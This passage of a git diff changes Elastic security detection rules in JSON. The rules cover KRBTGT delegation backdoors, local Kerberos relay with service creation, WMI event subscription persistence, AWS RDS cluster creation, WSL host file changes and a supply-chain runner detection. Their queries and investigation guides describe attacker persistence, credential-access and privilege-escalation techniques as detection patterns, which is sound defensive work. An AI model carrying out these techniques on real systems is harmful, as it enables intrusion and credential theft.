"https://socket.dev/blog/shai-hulud-strikes-again-v2", + "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack", + "https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.env_vars", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "df0553c8-2296-45ef-b4dc-3b88c4c130a7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nElastic Defend integration does not collect environment variable logging by default.\nIn order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration.\n #### To set up environment variable capture for an Elastic Agent policy:\n- Go to \u201cSecurity \u2192 Manage \u2192 Policies\u201d.\n- Select an \u201cElastic Agent policy\u201d.\n- Click \u201cShow advanced settings\u201d.\n- Scroll down or search for \u201clinux.advanced.capture_env_vars\u201d.\n- Enter the names of environment variables you want to capture, separated by commas.\n- For Linux, this rule requires the linux.advanced.capture_env_vars variable to be set to \"RUNNER_TRACKING_ID\".\n- For macOS, this rule requires the macos.advanced.capture_env_vars variable to be set to \"RUNNER_TRACKING_ID\".\n- Click \u201cSave\u201d.\nAfter saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly.\nFor more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.001", + "name": "Compromise Software Dependencies and Development Tools", + "reference": "https://attack.mitre.org/techniques/T1195/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "df0553c8-2296-45ef-b4dc-3b88c4c130a7_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_210.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_210.json deleted file mode 100644 index e9b1e046760..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_210.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the modification of the msDS-AllowedToDelegateTo attribute to KRBTGT. Attackers can use this technique to maintain persistence to the domain by having the ability to request tickets for the KRBTGT service.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "KRBTGT Delegation Backdoor", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating KRBTGT Delegation Backdoor\n\nIn Active Directory, the KRBTGT account is crucial for Kerberos ticket granting. Adversaries may exploit this by altering the msDS-AllowedToDelegateTo attribute, enabling unauthorized ticket requests and persistent domain access. The detection rule identifies such modifications by monitoring specific event actions and codes, flagging high-risk changes to the KRBTGT delegation settings.\n\n### Possible investigation steps\n\n- Review the event logs for the specific event code 4738 to identify the user account that was modified and verify if the msDS-AllowedToDelegateTo attribute includes the KRBTGT service.\n- Investigate the user account that performed the modification by checking their recent activities and login history to determine if the action was authorized or suspicious.\n- Examine the timeline of the modification event to correlate it with any other unusual activities or alerts in the network around the same time.\n- Check for any other modifications to sensitive attributes or accounts in Active Directory that might indicate a broader compromise.\n- Assess the potential impact on the domain by evaluating the access level and permissions of the modified account and any associated systems or services.\n- Consult with the IT security team to determine if there are any known maintenance activities or changes that could explain the modification, ensuring it was not a legitimate administrative action.\n\n### False positive analysis\n\n- Routine administrative tasks involving legitimate changes to the msDS-AllowedToDelegateTo attribute for service accounts may trigger alerts. Review the context of the change and verify with the IT team if it aligns with scheduled maintenance or updates.\n- Automated scripts or tools used for Active Directory management might modify delegation settings as part of their operations. Identify these scripts and exclude their activity from triggering alerts by creating exceptions based on the script's signature or the account used.\n- Changes made by trusted third-party applications that require delegation for functionality can be mistaken for malicious activity. Document these applications and adjust the detection rule to exclude their known and expected behavior.\n- Regular audits or compliance checks that involve modifications to delegation settings should be accounted for. Coordinate with audit teams to schedule these activities and temporarily adjust monitoring rules to prevent false positives during these periods.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or ticket requests using the KRBTGT account.\n- Revert any unauthorized changes to the msDS-AllowedToDelegateTo attribute for the KRBTGT account by restoring it to its previous state using a known good backup or manually resetting the attribute.\n- Reset the KRBTGT account password twice to invalidate any existing Kerberos tickets that may have been issued using the compromised delegation settings.\n- Conduct a thorough review of recent changes to user accounts and delegation settings in Active Directory to identify any other potential unauthorized modifications.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the scope of the compromise.\n- Implement enhanced monitoring for changes to critical accounts and attributes in Active Directory, focusing on the KRBTGT account and similar high-value targets.\n- Review and update access controls and delegation permissions to ensure that only authorized personnel have the ability to modify sensitive attributes like msDS-AllowedToDelegateTo.", - "query": "iam where event.code == \"4738\" and winlog.event_data.AllowedToDelegateTo : \"*krbtgt*\"\n", - "references": [ - "https://skyblue.team/posts/delegate-krbtgt", - "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AllowedToDelegateTo", - "type": "unknown" - } - ], - "risk_score": 73, - "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", - "setup": "## Setup\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1558", - "name": "Steal or Forge Kerberos Tickets", - "reference": "https://attack.mitre.org/techniques/T1558/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 210 - }, - "id": "e052c845-48d0-4f46-8a13-7d0aba05df82_210", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_207.json b/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_207.json deleted file mode 100644 index 3f47c34d917..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_207.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the creation of a new Amazon Relational Database Service (RDS) Aurora DB cluster or global database spread across multiple regions.", - "false_positives": [ - "Valid clusters may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Cluster creations by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS RDS Cluster Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS RDS Cluster Creation\n\nAmazon RDS facilitates database management by automating tasks like hardware provisioning and backups. Adversaries may exploit RDS by creating unauthorized clusters to exfiltrate data or establish persistence. The detection rule monitors successful creation events of RDS clusters, flagging potential misuse by correlating specific actions and outcomes, thus aiding in identifying unauthorized activities.\n\n### Possible investigation steps\n\n- Review the event details in AWS CloudTrail to confirm the event.dataset is 'aws.cloudtrail' and the event.provider is 'rds.amazonaws.com', ensuring the alert is based on the correct data source.\n- Verify the identity of the user or service account that initiated the CreateDBCluster or CreateGlobalCluster action by examining the user identity information in the event logs.\n- Check the event time and correlate it with any other suspicious activities or alerts in the same timeframe to identify potential patterns or coordinated actions.\n- Investigate the source IP address and geolocation associated with the event to determine if it aligns with expected access patterns or if it indicates unauthorized access.\n- Assess the configuration and settings of the newly created RDS cluster, including security groups, network settings, and any associated IAM roles, to identify potential security misconfigurations or vulnerabilities.\n- Review the AWS account's recent activity for any other unusual or unauthorized actions that might indicate broader compromise or misuse.\n\n### False positive analysis\n\n- Routine maintenance or testing activities by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles known to perform these tasks regularly.\n- Automated scripts or tools used for infrastructure management might create RDS clusters as part of their normal operation. Identify these scripts and exclude their actions from triggering alerts by using specific tags or identifiers.\n- Scheduled deployments or updates that involve creating new RDS clusters can be mistaken for unauthorized activity. Document these schedules and configure the detection rule to ignore events during these timeframes.\n- Development or staging environments often involve frequent creation and deletion of RDS clusters. Exclude these environments from monitoring by filtering based on environment-specific tags or naming conventions.\n- Partner or third-party integrations that require creating RDS clusters should be reviewed and whitelisted if deemed non-threatening, ensuring that their actions do not generate false positives.\n\n### Response and remediation\n\n- Immediately isolate the newly created RDS cluster to prevent any unauthorized access or data exfiltration. This can be done by modifying the security group rules to restrict inbound and outbound traffic.\n- Review CloudTrail logs to identify the IAM user or role responsible for the creation of the RDS cluster. Verify if the action was authorized and if the credentials have been compromised.\n- Revoke any suspicious or unauthorized IAM credentials and rotate keys for affected users or roles to prevent further unauthorized actions.\n- Conduct a thorough audit of the RDS cluster configuration and data to assess any potential data exposure or integrity issues. If sensitive data is involved, consider notifying relevant stakeholders and following data breach protocols.\n- Implement additional monitoring and alerting for RDS-related activities, focusing on unusual patterns or actions that align with persistence tactics, to enhance detection capabilities.\n- Escalate the incident to the security operations team for further investigation and to determine if additional containment or remediation actions are necessary.\n- Review and update IAM policies and permissions to ensure the principle of least privilege is enforced, reducing the risk of unauthorized RDS cluster creation in the future.", - "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(CreateDBCluster or CreateGlobalCluster) and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/create-db-cluster.html", - "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBCluster.html", - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/create-global-cluster.html", - "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateGlobalCluster.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS RDS", - "Use Case: Asset Visibility", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1133", - "name": "External Remote Services", - "reference": "https://attack.mitre.org/techniques/T1133/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_209.json b/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_209.json deleted file mode 100644 index c4b9b978552..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_209.json +++ /dev/null @@ -1,139 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, followed by a sevice creation from the same LogonId. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined user to local System privileges.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Service Creation via Local Kerberos Authentication", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Service Creation via Local Kerberos Authentication\n\nKerberos is a network authentication protocol designed to provide strong authentication for client/server applications. In Windows environments, it is often used for secure identity verification. Adversaries may exploit Kerberos by relaying authentication tickets locally to escalate privileges, potentially creating services with elevated rights. The detection rule identifies suspicious local logons using Kerberos, followed by service creation, indicating possible misuse. By monitoring specific logon events and service installations, it helps detect unauthorized privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the event logs for the specific LogonId identified in the alert to gather details about the logon session, including the user account involved and the time of the logon event.\n- Examine the source IP address and port from the logon event to confirm it matches the localhost (127.0.0.1 or ::1) and determine if this aligns with expected behavior for the user or system.\n- Investigate the service creation event (event ID 4697) associated with the same LogonId to identify the service name, executable path, and any related command-line arguments to assess if it is legitimate or potentially malicious.\n- Check for any recent changes or anomalies in the system or user account, such as modifications to user privileges, group memberships, or recent software installations, that could indicate unauthorized activity.\n- Correlate the findings with other security alerts or logs from the same timeframe to identify any patterns or additional indicators of compromise that may suggest a broader attack or compromise.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger the rule if administrators frequently log in locally using Kerberos and create services as part of their duties. To manage this, create exceptions for known administrative accounts or specific service creation activities that are part of regular maintenance.\n- Automated scripts or software updates that use Kerberos authentication and subsequently install or update services can also generate false positives. Identify these scripts or update processes and exclude their associated logon IDs from the rule.\n- Security software or monitoring tools that perform regular checks and use Kerberos for authentication might inadvertently trigger the rule. Review the behavior of these tools and whitelist their activities if they are verified as non-threatening.\n- In environments where localhost is used for testing or development purposes, developers might log in using Kerberos and create services. Consider excluding specific development machines or user accounts from the rule to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or privilege escalation.\n- Terminate any suspicious services created during the incident to halt potential malicious activities.\n- Conduct a thorough review of the affected system's event logs, focusing on the specific LogonId and service creation events to identify the scope of the compromise.\n- Reset the credentials of the compromised user account and any other accounts that may have been accessed using the relayed Kerberos tickets.\n- Apply patches and updates to the affected system and any other systems in the network to address known vulnerabilities that could be exploited in similar attacks.\n- Implement network segmentation to limit the ability of attackers to move laterally within the network, reducing the risk of privilege escalation.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken.", - "query": "sequence by winlog.computer_name with maxspan=5m\n [authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally using relayed kerberos Ticket */\n winlog.event_data.AuthenticationPackageName :\"Kerberos\" and winlog.logon.type == \"Network\" and\n cidrmatch(source.ip, \"127.0.0.0/8\", \"::1\") and source.port > 0] by winlog.event_data.TargetLogonId\n\n [any where\n /* event 4697 need to be logged */\n event.action : \"service-installed\"] by winlog.event_data.SubjectLogonId\n", - "references": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", - "https://github.com/cube0x0/KrbRelay", - "https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.64.0" - }, - { - "package": "windows", - "version": "^2.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "source.port", - "type": "long" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AuthenticationPackageName", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectLogonId", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.TargetLogonId", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.logon.type", - "type": "unknown" - } - ], - "risk_score": 73, - "rule_id": "e4e31051-ee01-4307-a6ee-b21b186958f4", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Credential Access", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1543", - "name": "Create or Modify System Process", - "reference": "https://attack.mitre.org/techniques/T1543/", - "subtechnique": [ - { - "id": "T1543.003", - "name": "Windows Service", - "reference": "https://attack.mitre.org/techniques/T1543/003/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1558", - "name": "Steal or Forge Kerberos Tickets", - "reference": "https://attack.mitre.org/techniques/T1558/" - } - ] - } - ], - "type": "eql", - "version": 209 - }, - "id": "e4e31051-ee01-4307-a6ee-b21b186958f4_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_208.json b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_208.json index 63bf5ab77d2..85172f00363 100644 --- a/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_208.json +++ b/packages/security_detection_engine/kibana/security_rule/e555105c-ba6d-481f-82bb-9b633e7b4827_208.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_308.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_308.json deleted file mode 100644 index 7e150e5d263..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_308.json +++ /dev/null @@ -1,111 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects the creation of a WMI Event Subscription. Attackers can abuse this mechanism for persistence or to elevate to SYSTEM privileges.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-windows.sysmon_operational-*", - "logs-endpoint.events.api-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Suspicious WMI Event Subscription Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious WMI Event Subscription Created\n\nWindows Management Instrumentation (WMI) is a powerful framework for managing data and operations on Windows systems. It allows for event subscriptions that can trigger actions based on system events. Adversaries exploit this for persistence by creating event subscriptions that execute malicious scripts or commands. The detection rule identifies such abuse by monitoring specific event codes and API calls related to the creation of suspicious WMI event consumers, flagging potential threats.\n\n### Possible investigation steps\n\n- Review the event logs for event code 21 in the windows.sysmon_operational dataset to identify the specific WMI event subscription created, focusing on the winlog.event_data.Operation and winlog.event_data.Consumer fields.\n- Examine the process details associated with the IWbemServices::PutInstance API call in the endpoint.events.api dataset, particularly the process.Ext.api.parameters.consumer_type, to determine the nature of the consumer created.\n- Investigate the source and context of the command or script associated with the CommandLineEventConsumer or ActiveScriptEventConsumer to assess its legitimacy and potential malicious intent.\n- Check for any related processes or activities around the time of the event to identify potential lateral movement or further persistence mechanisms.\n- Correlate the findings with other security alerts or logs to determine if this event is part of a broader attack pattern or campaign.\n\n### False positive analysis\n\n- Legitimate administrative scripts or tools may create WMI event subscriptions for system monitoring or automation. Review the source and context of the event to determine if it aligns with known administrative activities.\n- Software installations or updates might use WMI event subscriptions as part of their setup or configuration processes. Verify if the event coincides with recent software changes and consider excluding these specific events if they are routine.\n- Security software or management tools often use WMI for legitimate purposes. Identify and document these tools in your environment, and create exceptions for their known behaviors to reduce noise.\n- Scheduled tasks or system maintenance scripts may trigger similar events. Cross-reference with scheduled task logs or maintenance windows to confirm if these are expected activities.\n- Custom scripts developed in-house for system management might inadvertently match the detection criteria. Ensure these scripts are documented and consider excluding their specific signatures from the rule.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity and lateral movement.\n- Terminate any suspicious processes associated with the WMI event subscription, specifically those linked to CommandLineEventConsumer or ActiveScriptEventConsumer.\n- Remove the malicious WMI event subscription by using WMI management tools or scripts to delete the identified event consumer.\n- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any additional threats.\n- Review and reset any compromised credentials, especially if SYSTEM privileges were potentially accessed or escalated.\n- Monitor the network for any signs of similar activity or attempts to recreate the WMI event subscription, using enhanced logging and alerting mechanisms.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on other systems within the network.", - "query": "any where\n (\n (event.dataset == \"windows.sysmon_operational\" and event.code == \"21\" and\n winlog.event_data.Operation : \"Created\" and winlog.event_data.Consumer : (\"*subscription:CommandLineEventConsumer*\", \"*subscription:ActiveScriptEventConsumer*\")) or\n\n (event.dataset == \"endpoint.events.api\" and event.provider == \"Microsoft-Windows-WMI-Activity\" and process.Ext.api.name == \"IWbemServices::PutInstance\" and\n process.Ext.api.parameters.consumer_type in (\"ActiveScriptEventConsumer\", \"CommandLineEventConsumer\"))\n )\n", - "references": [ - "https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf", - "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96" - ], - "related_integrations": [ - { - "package": "windows", - "version": "^2.5.0" - }, - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "process.Ext.api.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "process.Ext.api.parameters.consumer_type", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.Consumer", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.Operation", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "e72f87d0-a70e-4f8d-8443-a6407bc34643", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Sysmon", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1546", - "name": "Event Triggered Execution", - "reference": "https://attack.mitre.org/techniques/T1546/", - "subtechnique": [ - { - "id": "T1546.003", - "name": "Windows Management Instrumentation Event Subscription", - "reference": "https://attack.mitre.org/techniques/T1546/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 308 - }, - "id": "e72f87d0-a70e-4f8d-8443-a6407bc34643_308", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_112.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_112.json new file mode 100644 index 00000000000..c78b1978eaa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_112.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects file creation and modification on the host system from the Windows Subsystem for Linux. Adversaries may enable and use WSL to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Host File System Changes via Windows Subsystem for Linux", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Host File System Changes via Windows Subsystem for Linux\n\nWindows Subsystem for Linux (WSL) allows users to run a Linux environment directly on Windows, facilitating seamless file access between systems. Adversaries may exploit WSL to modify host files stealthily, bypassing traditional security measures. The detection rule identifies suspicious file operations initiated by WSL processes, particularly those involving the Plan9FileSystem, to flag potential defense evasion attempts.\n\n### Possible investigation 